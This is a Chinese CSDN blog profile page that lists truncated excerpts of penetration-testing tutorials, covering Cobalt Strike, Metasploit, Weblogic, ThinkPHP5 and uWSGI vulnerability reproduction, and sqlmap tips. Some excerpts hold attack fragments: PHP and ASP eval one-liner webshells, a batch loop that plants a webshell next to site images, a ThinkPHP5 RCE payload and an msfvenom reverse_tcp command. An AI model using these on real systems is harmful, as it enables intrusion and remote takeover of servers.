qq_40624810
码龄7年
关注
提问 私信
  • 博客:77,924
    问答:4,376
    82,300
    总访问量
  • 30
    原创
  • 1,960,473
    排名
  • 27
    粉丝
  • 0
    铁粉

个人简介:只想开心点

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:四川省
  • 加入CSDN时间: 2017-10-14
博客简介:

qq_40624810的博客

查看详细资料
个人成就
  • 获得40次点赞
  • 内容获得25次评论
  • 获得309次收藏
  • 代码片获得471次分享
创作历程
  • 4篇
    2021年
  • 19篇
    2020年
  • 11篇
    2019年
  • 4篇
    2018年
成就勋章
TA的专栏
  • 社工小技巧
    1篇
  • 踩坑...
    1篇
  • CVE&&漏洞
    6篇
  • CTF
    3篇
  • 安全工具
    15篇
  • python
  • 渗透精华
    8篇
  • 网站搭建
    2篇
兴趣领域 设置
  • 网络空间安全
    系统安全web安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

公网服务器安装msf和CobaltStrike

cs安装:https://blog.csdn.net/qq_40624810/article/details/107572575具体注意java环境的配置,不同的系统配置命令不同。msf安装,我是参考这篇博客的:https://www.aqniu.com/vendor/50662.html因为的vps也是CentOS的,各位安装还是要看好自己的操作系统版本。1. 使用安装脚本安装MSFcurl https://raw.githubusercontent.com/rapid7/metas
转载
发布博客 2021.04.21 ·
1452 阅读 ·
0 点赞 ·
1 评论 ·
4 收藏

Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现

一、原理Weblogic WLS 组件中存在XMLDecoder远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击原理:该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。二、漏洞版本10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0三、漏洞搭建:判断:通过中间件去判断端口+/wls.
原创
发布博客 2021.03.11 ·
365 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

WebGoat靶场搭建

下载地址:https://github.com/WebGoat/WebGoat/releases下载完后在对应目录下启动:java -jar webgoat-server-8.0.0.M14.jar默认监听127.0.0.10:8080地址,如果想修改ip和端口可在启动时指定相应参数,如:java -jar webgoat-server-8.0.0.M14.jar --server.port=8000 --server.address=0.0.0.0默认监听端口8080,待启动完成后
原创
发布博客 2021.01.12 ·
696 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

java反序列化字节转字符串工具--SerializationDumper-v1.12

下载地址:https://github.com/NickstaDB/SerializationDumper一段数据如果以aced开头,那么他就是这一段java序列化的16进制用法 :java -jar SerializationDumper-v1.1.jar aced000573720026636e2e656d61792e...
原创
发布博客 2021.01.12 ·
1480 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

Beef-xss安装及使用

一、背景BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。BeEF
原创
发布博客 2020.12.10 ·
7729 阅读 ·
1 点赞 ·
5 评论 ·
43 收藏

Wooyun漏洞库本地搭建

身为男人,怎么能屈服于力量之下一、漏洞库虚拟机下载从github下载:https://github.com/hanc00l二、解压第一个文件三、用VM打开.vmx文件这是一个挂起状态的虚拟机,直接运行即可用户名/密码 : hancool/qwe123这里的IP可能会ping不通主机,这里方式为dhcp,可以重启网卡,或者重启虚拟机都能重新获得ip,保证主机和虚拟机可以ping通就行四、分别进入两个目录执行命令1. cd wooyunscrapy c..
原创
发布博客 2020.12.01 ·
1856 阅读 ·
4 点赞 ·
0 评论 ·
15 收藏

nessus安装及其使用

一、安装群里有人发了破解版的nessus,只需要打开虚拟机就可以使用。遇到两个问题:1、虚拟机无法打开镜像。2、虚拟机网络问题。二、解决问题1、虚拟机无法打开镜像:主要在配置文件中,修改成你VM对应的版本号参考博客:https://blog.csdn.net/qq_36651243/article/details/918628312、虚拟机网络打开后是无界面的linux系统,所以我们保证物理机和虚拟机在一个网段,在主机中用浏览器打开就好。因为环境已经配置好了。.
原创
发布博客 2020.11.30 ·
1194 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

.htacess文件利用,上传webshell

背景:在做墨者靶场一道文件上传的题目遇见的,有一种做法利用php3、php5后缀绕过。还有就是这种利用.htacess文件去上传webshell。参考博客:https://blog.csdn.net/jokerhappy/article/details/107838541SetHandler application/x-httpd-http上述代码写入文件,上传文件抓包将文件名改为..htacess,发送编写一句话木马如下:<?php @eval($_POST['joke
原创
发布博客 2020.11.10 ·
718 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

利用shell写入一句话

for %i in (d) do (cd /d %i:\ & (for /r %j in (*050.jpg) do echo ^<%eval request^(chr^(35^)^)%^>>%~dpjK.asp)遍历050.jpg,找到后在同级目录下写入一句话。注意:050.jpg替换为要渗透网站中可以知道目录的图片,密码为chr35 解码后的#然后就可以用菜刀连接...
原创
发布博客 2020.11.09 ·
330 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

Thinkphp5-0-X远程代码执行漏洞

参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276其实后面的&test=-1参数没有意义,只要有captcha就行在post里加上我们要提交的参数_method=__construct&filter[]=phpinfo&method=GET提交...
原创
发布博客 2020.11.09 ·
985 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

uWSGI 漏洞(CVE-2018-7490)

… 表示上一级目录%2f是url编码的/uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 访问地址存在使用信息,存在uwsgi/php,但是没找到显示版本的地址,就盲试、可以多加几个%2f确保是根目录...
原创
发布博客 2020.11.09 ·
529 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

cobalt strike 使用(一)

背景前两天安装好了cs,今天趁着周末试试怎么使用,结果弄了半天没有成功上线过一次靶机。换了个方式结果都行了。赶紧写个博客记录下。一、本地连接在无数次连接不到靶机后,我果断放弃了用公网服务器作为服务端的方式。我用kali同时作为服务端和客户端尝试1.服务端启动服务端,同样的命令只不过ip改成kali内网的ip2.客户端因为是linux下所以不能在cobalstrike目录下用命令启动java -XX:+AggressiveHeap -XX:+UseParallelGC
原创
发布博客 2020.07.26 ·
710 阅读 ·
0 点赞 ·
2 评论 ·
1 收藏

kail安装中出现无效的仓库镜像

答:

建议你看这个:
https://blog.csdn.net/Vie0211/article/details/106254883?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~first_rank_v2~rank_v25-4-106254883.nonecase
我就是按照这个最后的步骤解决了

回答问题 2020.07.25

Cobalt Strike安装

背景早就听说cs(Cobalt Strike)大名了,今天尝试安装一下。过程中遇到种种坑,其实大多数都是因为自己的蠢。吃一堑长一智以后长点脑子。一、JAVA环境cs无论是客户端或者服务端都要依赖于java环境,所以我们先要安装java环境。这里我们服务器是基于debain版本的linux,所以我们linux下安装jdk-11.0.8_linux-x64的java环境,因为我记得cs官方文档里好像说过jdk要11.0以上版本。具体安装包可以官网下载。下载好我们上传到服务器开始安装。安装位置在
原创
发布博客 2020.07.25 ·
1474 阅读 ·
1 点赞 ·
6 评论 ·
9 收藏

Sqlmap小技巧

在sqlmap无数次没跑出来数据,不是连接失败、各种error后。我果断放弃了sqlmap用超级注入工具,超级注入工具他不香嘛!直到深入了解了下sqlmap后才发现自己的愚昧无知。就他娘会用个sqlmap -u "" --dbs,能跑出来才怪一、tamper脚本很多站点有waf或者过滤,只要在sqlmap 注入语句后加入小小的一个--tamper +脚本文件,就可以绕过很多waf了。脚本文件sqlmap中有自带的,你也可以网上找加到文件中。二、force--ssl这个参数以前老大..
转载
发布博客 2020.07.24 ·
1360 阅读 ·
2 点赞 ·
0 评论 ·
9 收藏

利用公钥实现SSH免密登录

一、背景看了B站视频,了解到新姿势。SSH免密登录可以在遇到文件上传漏洞时使用,需要的条件比较多。目标开始了ssh服务,且存在上传漏洞。我们就可以通过上传漏洞实现ssh免密登录。二、原理ssh远程连接我知道的有两种方式。一是通过账号密码,二是通过公私钥。我们产生一对密钥对,分为公钥和私钥。将公钥上传到要登录的服务器,然后通过私钥远程连接服务器就可以实现免密登录了。三、实现1、账号密码登录首先我们看看常规的账户密码形式的远程登录。我们就可以登录到服务器了,可是在渗透过程显然无法
原创
发布博客 2020.07.14 ·
1559 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

漏洞扫描工具nikto

https://blog.csdn.net/smli_ng/article/details/105994754?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecas
转载
发布博客 2020.07.14 ·
369 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

文件上传漏洞利用

一、背景B站看了个up靶机练习的视频,学习到新东西写下来。如有侵权,联系马上删除!视频:https://www.bilibili.com/video/BV1Tg4y1B7TT(up主才12岁,真是自愧不如!)二、原理找到一处上传点,上传shell,利用msfvenom生成。msfvenom -p php/meterpreter/revese_tcp LHOST=192.168.3.171 LPORT=4444 -f raw > shell.php本来上传后,利用msfcon
原创
发布博客 2020.07.14 ·
427 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

Windows server 2012 云服务器利用iis搭建网站

背景前几天把原本linux的云服务器重装成win server 2012,用rdp远程连接。后来看了好多渗透教程都是自己在云服务器上搭建web,所以想试试用iis搭建个本地网站。以前弄过已经忘了,这次写个博客以后再想起来就可以看看。话不多说,进入主题。一、安装iis现在服务器仪表盘,管理->添加角色和功能在安装过程一直下一步,直到服务器角色 选中web服务器,然后一直下一步直到安装。安装后就可以在工具 选中IIS管理服务器,进入管理界面。二、网站搭建把原来的网站
原创
发布博客 2020.07.13 ·
1481 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏

中国蚁剑

听老大说菜刀不咋好,让我换个中国蚁剑https://www.fujieace.com/hacker/tools/antsword.html
转载
发布博客 2020.07.07 ·
1307 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏
加载更多